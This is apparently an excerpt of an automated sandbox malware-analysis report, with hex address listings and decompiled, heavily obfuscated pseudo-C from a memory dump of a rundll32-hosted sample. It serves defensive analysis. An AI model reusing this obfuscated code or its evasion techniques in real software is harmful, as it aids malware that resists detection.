                                                                                                                    0x0034d090
                                                                                                                    0x0034d119
                                                                                                                    0x0034d122
                                                                                                                    0x0034d12d
                                                                                                                    0x0034d13b
                                                                                                                    0x0034d149
                                                                                                                    0x0034d16e
                                                                                                                    0x0034d19b
                                                                                                                    0x0034d1ad
                                                                                                                    0x0034d1b2
                                                                                                                    0x0034d1b5
                                                                                                                    0x00000000
                                                                                                                    0x0034d096
                                                                                                                    0x0034d09c
                                                                                                                    0x0034d0e8
                                                                                                                    0x0034d0f3
                                                                                                                    0x0034d0fa
                                                                                                                    0x0034d109
                                                                                                                    0x0034d10a
                                                                                                                    0x0034d10f
                                                                                                                    0x0034d112
                                                                                                                    0x00000000
                                                                                                                    0x0034d09e
                                                                                                                    0x0034d09e
                                                                                                                    0x0034d0a0
                                                                                                                    0x00000000
                                                                                                                    0x0034d0a6
                                                                                                                    0x0034d0a6
                                                                                                                    0x0034d0b1
                                                                                                                    0x0034d0b2
                                                                                                                    0x0034d0b3
                                                                                                                    0x0034d0b4
                                                                                                                    0x0034d0b5
                                                                                                                    0x0034d0ca
                                                                                                                    0x0034d0cb
                                                                                                                    0x0034d0d8
                                                                                                                    0x0034d0d8
                                                                                                                    0x0034d0a0
                                                                                                                    0x0034d09c
                                                                                                                    0x0034d0db
                                                                                                                    0x0034d0e7
                                                                                                                    0x0034d0e7
                                                                                                                    0x0034d1bc
                                                                                                                    0x0034d1c5
                                                                                                                    0x0034d1cd
                                                                                                                    0x0034d1db
                                                                                                                    0x0034d212
                                                                                                                    0x0034d21f
                                                                                                                    0x0034d223
                                                                                                                    0x0034d22e
                                                                                                                    0x0034d243
                                                                                                                    0x0034d248
                                                                                                                    0x0034d24b
                                                                                                                    0x0034d24d
                                                                                                                    0x0034d24d
                                                                                                                    0x0034d24d
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                    • API String ID: 1514166925-553023378
                                                                                                                    • Opcode ID: 844dea79e61c175fe943ccf09396ae73981a340b4748174b305675e6f8c48915
                                                                                                                    • Instruction ID: d2fd87b41c391905616e27448f901eb971d8d9eb1caa52f8ed90c7c756bba997
                                                                                                                    • Opcode Fuzzy Hash: 844dea79e61c175fe943ccf09396ae73981a340b4748174b305675e6f8c48915
                                                                                                                    • Instruction Fuzzy Hash: 1D021FB15083819FD365CF25C98AA9BFBE5FBC4718F10891DF1D98A260D7B1894ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003370B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003370B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x353dfc; // 0x0
							_t302 = E00345B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x353dfc; // 0x0
								_t306 = E00345B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E00337FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E00348519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                    0x003370bc
                                                                                                                    0x003370c3
                                                                                                                    0x003370c6
                                                                                                                    0x003370cd
                                                                                                                    0x003370d4
                                                                                                                    0x003370d5
                                                                                                                    0x003370d6
                                                                                                                    0x003370d7
                                                                                                                    0x003370dc
                                                                                                                    0x003370e7
                                                                                                                    0x003370e9
                                                                                                                    0x003370f0
                                                                                                                    0x003370f3
                                                                                                                    0x003370fd
                                                                                                                    0x00337102
                                                                                                                    0x00337107
                                                                                                                    0x0033710f
                                                                                                                    0x00337117
                                                                                                                    0x0033711f
                                                                                                                    0x00337127
                                                                                                                    0x00337132
                                                                                                                    0x00337137
                                                                                                                    0x0033713d
                                                                                                                    0x00337145
                                                                                                                    0x0033714d
                                                                                                                    0x00337159
                                                                                                                    0x0033715e
                                                                                                                    0x00337164
                                                                                                                    0x00337169
                                                                                                                    0x0033716e
                                                                                                                    0x00337176
                                                                                                                    0x00337183
                                                                                                                    0x00337186
                                                                                                                    0x0033718a
                                                                                                                    0x00337198
                                                                                                                    0x0033719c
                                                                                                                    0x003371a4
                                                                                                                    0x003371ac
                                                                                                                    0x003371b4
                                                                                                                    0x003371bc
                                                                                                                    0x003371c1
                                                                                                                    0x003371c9
                                                                                                                    0x003371d1
                                                                                                                    0x003371db
                                                                                                                    0x003371df
                                                                                                                    0x003371e4
                                                                                                                    0x003371ec
                                                                                                                    0x003371f4
                                                                                                                    0x003371fc
                                                                                                                    0x00337201
                                                                                                                    0x00337206
                                                                                                                    0x0033720e
                                                                                                                    0x00337216
                                                                                                                    0x0033721e
                                                                                                                    0x00337226
                                                                                                                    0x0033722e
                                                                                                                    0x00337233
                                                                                                                    0x00337238
                                                                                                                    0x00337240
                                                                                                                    0x00337248
                                                                                                                    0x00337256
                                                                                                                    0x0033725b
                                                                                                                    0x00337261
                                                                                                                    0x00337266
                                                                                                                    0x0033726e
                                                                                                                    0x0033727b
                                                                                                                    0x0033727e
                                                                                                                    0x00337282
                                                                                                                    0x0033728a
                                                                                                                    0x00337297
                                                                                                                    0x0033729b
                                                                                                                    0x003372a3
                                                                                                                    0x003372ab
                                                                                                                    0x003372b3
                                                                                                                    0x003372b8
                                                                                                                    0x003372c0
                                                                                                                    0x003372c8
                                                                                                                    0x003372cd
                                                                                                                    0x003372d2
                                                                                                                    0x003372da
                                                                                                                    0x003372e2
                                                                                                                    0x003372ea
                                                                                                                    0x003372f2
                                                                                                                    0x003372ff
                                                                                                                    0x00337303
                                                                                                                    0x0033730b
                                                                                                                    0x0033731b
                                                                                                                    0x0033731f
                                                                                                                    0x00337327
                                                                                                                    0x0033732f
                                                                                                                    0x00337337
                                                                                                                    0x0033733f
                                                                                                                    0x00337344
                                                                                                                    0x0033734c
                                                                                                                    0x00337354
                                                                                                                    0x00337359
                                                                                                                    0x0033735a
                                                                                                                    0x0033735e
                                                                                                                    0x00337363
                                                                                                                    0x0033736b
                                                                                                                    0x00337373
                                                                                                                    0x0033737b
                                                                                                                    0x00337385
                                                                                                                    0x00337389
                                                                                                                    0x0033738d
                                                                                                                    0x00337395
                                                                                                                    0x0033739d
                                                                                                                    0x003373a2
                                                                                                                    0x003373aa
                                                                                                                    0x003373b2
                                                                                                                    0x003373b7
                                                                                                                    0x003373bf
                                                                                                                    0x003373c7
                                                                                                                    0x003373cf
                                                                                                                    0x003373d4
                                                                                                                    0x003373dc
                                                                                                                    0x003373ea
                                                                                                                    0x003373ee
                                                                                                                    0x003373f6
                                                                                                                    0x003373fe
                                                                                                                    0x00337403
                                                                                                                    0x0033740b
                                                                                                                    0x00337413
                                                                                                                    0x0033741b
                                                                                                                    0x00337420
                                                                                                                    0x00337428
                                                                                                                    0x00337430
                                                                                                                    0x0033743d
                                                                                                                    0x00337443
                                                                                                                    0x00337448
                                                                                                                    0x0033744d
                                                                                                                    0x00337455
                                                                                                                    0x00337463
                                                                                                                    0x0033746b
                                                                                                                    0x0033746f
                                                                                                                    0x00337477
                                                                                                                    0x00337477
                                                                                                                    0x00337485
                                                                                                                    0x00337592
                                                                                                                    0x003375a6
                                                                                                                    0x003375ab
                                                                                                                    0x003375b2
                                                                                                                    0x003375b4
                                                                                                                    0x00000000
                                                                                                                    0x003375b4
                                                                                                                    0x0033748b
                                                                                                                    0x00337491
                                                                                                                    0x00337531
                                                                                                                    0x00337542
                                                                                                                    0x00337547
                                                                                                                    0x0033754e
                                                                                                                    0x003375d7
                                                                                                                    0x003375d9
                                                                                                                    0x003375e1
                                                                                                                    0x00337550
                                                                                                                    0x00337550
                                                                                                                    0x00000000
                                                                                                                    0x00337550
                                                                                                                    0x00337493
                                                                                                                    0x00337499
                                                                                                                    0x003374d4
                                                                                                                    0x003374d5
                                                                                                                    0x003374d6
                                                                                                                    0x003374db
                                                                                                                    0x003374e6
                                                                                                                    0x003374ec
                                                                                                                    0x00000000
                                                                                                                    0x003374ec
                                                                                                                    0x0033749b
                                                                                                                    0x003374a1
                                                                                                                    0x00000000
                                                                                                                    0x003374a7
                                                                                                                    0x003374b6
                                                                                                                    0x003374bb
                                                                                                                    0x003374a1
                                                                                                                    0x00337499
                                                                                                                    0x00337491
                                                                                                                    0x003375e4
                                                                                                                    0x003375f0
                                                                                                                    0x003375f0
                                                                                                                    0x003375be
                                                                                                                    0x003375c0
                                                                                                                    0x003375c0
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                    • API String ID: 0-2314355462
                                                                                                                    • Opcode ID: af9e1fa6d42ca2ef492040537a1319c052bf9d5522c3d27ce82b2ba089b66b4c
                                                                                                                    • Instruction ID: c80b0e8136a420f63ed013eeb41e76421789ad6ba88c785d7396a23983e550f4
                                                                                                                    • Opcode Fuzzy Hash: af9e1fa6d42ca2ef492040537a1319c052bf9d5522c3d27ce82b2ba089b66b4c
                                                                                                                    • Instruction Fuzzy Hash: 7FD10EB11083819FD765CF66C48995BBBF1FBC4748F50891DF2A68A220C7B6D549CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034C631 Relevance: 10.2, Strings: 8, Instructions: 218COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0034C631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E0033474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E0033474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E0033474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E0034C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E0033474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E0033474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E0034C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                    0x0034c631
                                                                                                                    0x0034c638
                                                                                                                    0x0034c63a
                                                                                                                    0x0034c644
                                                                                                                    0x0034c649
                                                                                                                    0x0034c64e
                                                                                                                    0x0034c656
                                                                                                                    0x0034c65e
                                                                                                                    0x0034c666
                                                                                                                    0x0034c66e
                                                                                                                    0x0034c676
                                                                                                                    0x0034c67e
                                                                                                                    0x0034c682
                                                                                                                    0x0034c68a
                                                                                                                    0x0034c692
                                                                                                                    0x0034c697
                                                                                                                    0x0034c69f
                                                                                                                    0x0034c6a7
                                                                                                                    0x0034c6af
                                                                                                                    0x0034c6b7
                                                                                                                    0x0034c6bf
                                                                                                                    0x0034c6c7
                                                                                                                    0x0034c6cf
                                                                                                                    0x0034c6d7
                                                                                                                    0x0034c6e2
                                                                                                                    0x0034c6e4
                                                                                                                    0x0034c6e9
                                                                                                                    0x0034c6ef
                                                                                                                    0x0034c6f7
                                                                                                                    0x0034c6fc
                                                                                                                    0x0034c704
                                                                                                                    0x0034c70c
                                                                                                                    0x0034c714
                                                                                                                    0x0034c719
                                                                                                                    0x0034c721
                                                                                                                    0x0034c729
                                                                                                                    0x0034c731
                                                                                                                    0x0034c736
                                                                                                                    0x0034c73e
                                                                                                                    0x0034c746
                                                                                                                    0x0034c74b
                                                                                                                    0x0034c750
                                                                                                                    0x0034c758
                                                                                                                    0x0034c760
                                                                                                                    0x0034c76c
                                                                                                                    0x0034c771
                                                                                                                    0x0034c777
                                                                                                                    0x0034c77f
                                                                                                                    0x0034c787
                                                                                                                    0x0034c793
                                                                                                                    0x0034c796
                                                                                                                    0x0034c79a
                                                                                                                    0x0034c7a2
                                                                                                                    0x0034c7aa
                                                                                                                    0x0034c7b7
                                                                                                                    0x0034c7bb
                                                                                                                    0x0034c7c3
                                                                                                                    0x0034c7d0
                                                                                                                    0x0034c7d4
                                                                                                                    0x0034c7d9
                                                                                                                    0x0034c7e1
                                                                                                                    0x0034c7e9
                                                                                                                    0x0034c7f1
                                                                                                                    0x0034c7f9
                                                                                                                    0x0034c801
                                                                                                                    0x0034c813
                                                                                                                    0x0034c817
                                                                                                                    0x0034c81f
                                                                                                                    0x0034c827
                                                                                                                    0x0034c834
                                                                                                                    0x0034c838
                                                                                                                    0x0034c840
                                                                                                                    0x0034c848
                                                                                                                    0x0034c850
                                                                                                                    0x0034c858
                                                                                                                    0x0034c860
                                                                                                                    0x0034c868
                                                                                                                    0x0034c870
                                                                                                                    0x0034c878
                                                                                                                    0x0034c880
                                                                                                                    0x0034c888
                                                                                                                    0x0034c890
                                                                                                                    0x0034c898
                                                                                                                    0x0034c8a5
                                                                                                                    0x0034c8ae
                                                                                                                    0x0034c8b2
                                                                                                                    0x0034c8ba
                                                                                                                    0x0034c8c2
                                                                                                                    0x0034c8ca
                                                                                                                    0x0034c8cf
                                                                                                                    0x0034c8d7
                                                                                                                    0x0034c8df
                                                                                                                    0x0034c8e4
                                                                                                                    0x0034c8e9
                                                                                                                    0x0034c8f1
                                                                                                                    0x0034c8f9
                                                                                                                    0x0034c901
                                                                                                                    0x0034c909
                                                                                                                    0x0034c911
                                                                                                                    0x0034c911
                                                                                                                    0x0034c919
                                                                                                                    0x0034c919
                                                                                                                    0x0034c919
                                                                                                                    0x0034c919
                                                                                                                    0x0034c91b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034c921
                                                                                                                    0x0034c9e2
                                                                                                                    0x0034c9e3
                                                                                                                    0x0034c9e4
                                                                                                                    0x0034c9e9
                                                                                                                    0x0034c9ec
                                                                                                                    0x0034c9f1
                                                                                                                    0x00000000
                                                                                                                    0x0034c927
                                                                                                                    0x0034c92d
                                                                                                                    0x0034c9c0
                                                                                                                    0x0034c9c1
                                                                                                                    0x0034c9c2
                                                                                                                    0x0034c9c7
                                                                                                                    0x0034c9ca
                                                                                                                    0x0034c9cf
                                                                                                                    0x00000000
                                                                                                                    0x0034c933
                                                                                                                    0x0034c939
                                                                                                                    0x0034c99e
                                                                                                                    0x0034c99f
                                                                                                                    0x0034c9a0
                                                                                                                    0x0034c9a5
                                                                                                                    0x0034c9a8
                                                                                                                    0x0034c9ad
                                                                                                                    0x00000000
                                                                                                                    0x0034c93b
                                                                                                                    0x0034c941
                                                                                                                    0x0034c97d
                                                                                                                    0x0034c981
                                                                                                                    0x0034c986
                                                                                                                    0x0034c989
                                                                                                                    0x0034c98e
                                                                                                                    0x00000000
                                                                                                                    0x0034c943
                                                                                                                    0x0034c949
                                                                                                                    0x00000000
                                                                                                                    0x0034c94f
                                                                                                                    0x0034c95b
                                                                                                                    0x0034c95c
                                                                                                                    0x0034c95d
                                                                                                                    0x0034c962
                                                                                                                    0x0034c965
                                                                                                                    0x0034c96a
                                                                                                                    0x00000000
                                                                                                                    0x0034c96a
                                                                                                                    0x0034c949
                                                                                                                    0x0034c941
                                                                                                                    0x0034c939
                                                                                                                    0x0034c92d
                                                                                                                    0x0034ca5f
                                                                                                                    0x0034ca68
                                                                                                                    0x0034ca68
                                                                                                                    0x0034c9fe
                                                                                                                    0x0034ca26
                                                                                                                    0x0034ca27
                                                                                                                    0x0034ca28
                                                                                                                    0x0034ca2d
                                                                                                                    0x0034ca30
                                                                                                                    0x0034ca32
                                                                                                                    0x00000000
                                                                                                                    0x0034ca00
                                                                                                                    0x0034ca06
                                                                                                                    0x0034ca5d
                                                                                                                    0x0034ca08
                                                                                                                    0x0034ca0e
                                                                                                                    0x00000000
                                                                                                                    0x0034ca10
                                                                                                                    0x0034ca10
                                                                                                                    0x00000000
                                                                                                                    0x0034ca10
                                                                                                                    0x0034ca0e
                                                                                                                    0x0034ca06
                                                                                                                    0x00000000
                                                                                                                    0x0034ca34
                                                                                                                    0x0034ca34
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
